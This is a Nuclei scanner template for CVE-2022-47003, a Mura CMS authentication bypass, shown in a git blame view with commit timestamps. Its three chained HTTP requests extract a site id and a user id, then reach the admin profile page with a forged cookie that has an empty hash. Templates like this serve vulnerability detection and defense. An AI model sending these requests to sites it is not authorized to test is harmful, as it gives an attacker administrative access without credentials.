nuclei-templates/cves/2022/CVE-2022-47003.yaml

70 lines
1.7 KiB
YAML
Raw Normal View History

2023-03-13 20:37:30 +00:00
id: CVE-2022-47003
2023-03-14 06:07:42 +00:00
2023-03-13 20:37:30 +00:00
info:
name: Mura CMS - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the Remember Me function of Mura CMS before v10.0.580 allows attackers to bypass authentication via a crafted web request.
reference:
2023-03-13 20:46:21 +00:00
- https://hoyahaxa.blogspot.com/2023/03/authentication-bypass-mura-masa.html
2023-03-13 20:37:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-47003
- http://mura.com
- https://www.murasoftware.com/mura-cms/
2023-03-14 06:07:42 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-03-14 06:07:42 +00:00
cve-id: CVE-2022-47003
cwe-id: CWE-863
2023-03-13 20:37:30 +00:00
metadata:
shodan-query: 'Generator: Musa CMS'
2023-03-13 20:53:58 +00:00
verified: "true"
2023-03-13 20:37:30 +00:00
tags: cve,cve2022,auth-bypass,cms,mura
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1
Host: {{Hostname}}
- |
GET /admin/?muraAction=cEditProfile.edit HTTP/1.1
Host: {{Hostname}}
Cookie: userid={{uuid}}; userhash=
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
condition: and
dsl:
2023-03-13 20:43:24 +00:00
- 'contains(body_3,"\"userid\"")'
2023-03-13 20:37:30 +00:00
- type: word
part: body_3
words:
- "Edit Profile"
extractors:
- type: regex
part: body
name: siteid
group: 1
2023-03-13 20:43:24 +00:00
internal: true
2023-03-13 20:37:30 +00:00
regex:
- 'siteid:"(.*?)"'
- type: regex
part: body
name: uuid
group: 1
2023-03-13 20:43:24 +00:00
internal: true
2023-03-13 20:37:30 +00:00
regex:
- '"lastupdatebyid":"([A-F0-9-]+)"'